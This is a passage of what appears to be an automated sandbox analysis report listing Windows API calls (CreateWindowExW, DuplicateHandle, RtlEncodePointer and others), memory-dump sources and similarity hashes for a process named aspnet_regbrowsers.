                                • GetCurrentProcess.KERNEL32 ref: 013A6B60
                                • GetCurrentThread.KERNEL32 ref: 013A6B9D
                                • GetCurrentProcess.KERNEL32 ref: 013A6BDA
                                • GetCurrentThreadId.KERNEL32 ref: 013A6C33
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: cd7d1de1b661aabff8ab23117a80940f4bbf9fb6d113503108f4ea89d653ce18
                                • Instruction ID: bb12cf0d0e34124d86e4df2e8c4447bfd8d5898abe14608cc77f446f706dc92b
                                • Opcode Fuzzy Hash: cd7d1de1b661aabff8ab23117a80940f4bbf9fb6d113503108f4ea89d653ce18
                                • Instruction Fuzzy Hash: 7B5164B0D006498FDB54CFAAD649B9EBBF0EF88318F248459E119A3390DB349884CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                control_flow_graph 38 13a5244-13a52b6 39 13a52b8-13a52be 38->39 40 13a52c1-13a52c8 38->40 39->40 41 13a52ca-13a52d0 40->41 42 13a52d3-13a530b 40->42 41->42 43 13a5313-13a5372 CreateWindowExW 42->43 44 13a537b-13a53b3 43->44 45 13a5374-13a537a 43->45 49 13a53c0 44->49 50 13a53b5-13a53b8 44->50 45->44 51 13a53c1 49->51 50->49 51->51
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013A5362
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: f394965802d0d4550bdf82eb10fa967543306aa75a9c650312c2ed9288efff1d
                                • Instruction ID: 5d658b0a5de96b0a093412c413389f8aee1aa5e1172041e697ab1c506e7870ae
                                • Opcode Fuzzy Hash: f394965802d0d4550bdf82eb10fa967543306aa75a9c650312c2ed9288efff1d
                                • Instruction Fuzzy Hash: AD51D3B5D003099FDB14CFA9C884ADEBFB5FF88314F64812AE819AB250D7759885CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph (rendered graph omitted)
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013A5362
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 5dd71389609495d6c8939692ed3963d1c115c7abdecfb4b274a8e68e53c9d299
                                • Instruction ID: 2f6a358ff658b6d626bcd37876c9c935992acad2abade37c22b285aef748d8e1
                                • Opcode Fuzzy Hash: 5dd71389609495d6c8939692ed3963d1c115c7abdecfb4b274a8e68e53c9d299
                                • Instruction Fuzzy Hash: 6141A2B5D003099FDB14CF99C884ADEBFB5FF88314F64852AE819AB250D7759845CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph (rendered graph omitted)
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 013A7CB1
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 95b150427358f12e2eac56b8418a8d71c614996afd7bede39da7f0fda38b957c
                                • Instruction ID: f249d62f3ebdef53bbbcab9c5750014b08c8d02a441d279b1592f13135fcec28
                                • Opcode Fuzzy Hash: 95b150427358f12e2eac56b8418a8d71c614996afd7bede39da7f0fda38b957c
                                • Instruction Fuzzy Hash: 8F415DB5A00709CFDB14CF99C488AAABBF5FF88318F24C459D519AB321D735A941CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph (rendered graph omitted)
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013A6DAF
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 02218faccbec67c8416cada9eaad29faf7ef9300cde19b4a1a7942b88abd57d5
                                • Instruction ID: bff75cb034f777e02c3665b0a99afd6314766f1023ee11ccd97691ba15155bd2
                                • Opcode Fuzzy Hash: 02218faccbec67c8416cada9eaad29faf7ef9300cde19b4a1a7942b88abd57d5
                                • Instruction Fuzzy Hash: 6A21E4B59002499FDB10CFA9D884AEEBFF4EB48324F14841EE914A3310D774A954DFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph (rendered graph omitted)
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013A6DAF
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 2a030c0aa154be106a04f8b7591f67bf6f4f4c0701f14238764eab7dff594422
                                • Instruction ID: 332a0f065b2880f16d205c92ba0a3a656792498ace183ebc38c0bc6e32d58cbf
                                • Opcode Fuzzy Hash: 2a030c0aa154be106a04f8b7591f67bf6f4f4c0701f14238764eab7dff594422
                                • Instruction Fuzzy Hash: CD21D5B59002499FDB10CFAAD884ADEFFF8FB48324F14841AE914A3310D774A954CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph (rendered graph omitted)
                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 013AC222
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID:
                                • API String ID: 2118026453-0
                                • Opcode ID: bf993a2799f635b72886a262228842b94792560bf48792f40303c3f9cecd8964
                                • Instruction ID: bbb2b357eca2af49700f2198abb0c5b07b8823afc5e1e20654e0f0a911c7585b
                                • Opcode Fuzzy Hash: bf993a2799f635b72886a262228842b94792560bf48792f40303c3f9cecd8964
                                • Instruction Fuzzy Hash: 83219A719007098FDB60DFA9D8493DABFF4EB44328F60982AD408B3B02C7386445CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph (rendered graph omitted)
                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 013AC222
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID:
                                • API String ID: 2118026453-0
                                • Opcode ID: 8f1b771b2401b91507e26232a7e869cf3eccadcd4fe2d9d599176d268cbfbf39
                                • Instruction ID: 689612f7831d81e2c3fa6177d7b08ac03894232ad203c4b898978762c0f60b7e
                                • Opcode Fuzzy Hash: 8f1b771b2401b91507e26232a7e869cf3eccadcd4fe2d9d599176d268cbfbf39
                                • Instruction Fuzzy Hash: 321189709017098FDB50DFA9D9087DABFF4EB45328F60842AD408A3A02C7386448CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000025.00000002.943953800.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_58e0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4e36a106582c31ba653c8a3c88aab44aac59679a95cd24e555141f0213ede465
                                • Instruction ID: 60fed444fe4a2a55c11fdf7ca3286ded5fa0d5450b5047c87f91d6d9c9a2e39e
                                • Opcode Fuzzy Hash: 4e36a106582c31ba653c8a3c88aab44aac59679a95cd24e555141f0213ede465
                                • Instruction Fuzzy Hash: 1851A030A046198FCB14DF69E494AADBBF5FB86318F568428D946EB385CB30EC41CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000025.00000002.943953800.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_58e0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 770412a4313aca529d64f606d6133fa6c6071c7f8253610aae7aa474f2d42c3a
                                • Instruction ID: 1b82023bc7f53da3e487854ec040f8ba7eb38915fdf97d475199d52bfddf0703
                                • Opcode Fuzzy Hash: 770412a4313aca529d64f606d6133fa6c6071c7f8253610aae7aa474f2d42c3a
                                • Instruction Fuzzy Hash: CA31A971D12349DFDB15CFB0C8446DCBBB2EF8A304F298A6AE401AB251DB716986CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000025.00000002.943953800.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_58e0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0814c4160745b66425bc0add92654afad777e783736c757139b60ed7314f2e7
                                • Instruction ID: a99ffd822b68371b2272fc698402a973240017176c39129ecdd8a0f1a83eefd8
                                • Opcode Fuzzy Hash: a0814c4160745b66425bc0add92654afad777e783736c757139b60ed7314f2e7
                                • Instruction Fuzzy Hash: 57216D31D01209DBCB14DFA5D8496DDFBB6EF89314F24862AE412A7340DB716986CF51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000025.00000002.943953800.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_58e0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3823a70ca398c599ec4a43f5d7033b4ce07fad0b11663445188e7b12104ae67c
                                • Instruction ID: d7e3f47e950a81ca5f1641f84e70ce851002c26241f3c020f7d1e0eaa7462b9c
                                • Opcode Fuzzy Hash: 3823a70ca398c599ec4a43f5d7033b4ce07fad0b11663445188e7b12104ae67c
                                • Instruction Fuzzy Hash: 6E21BE70A006188FCB14DFA5E584AADBBF5BF4A308F668069E805EB250CB70EC45CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions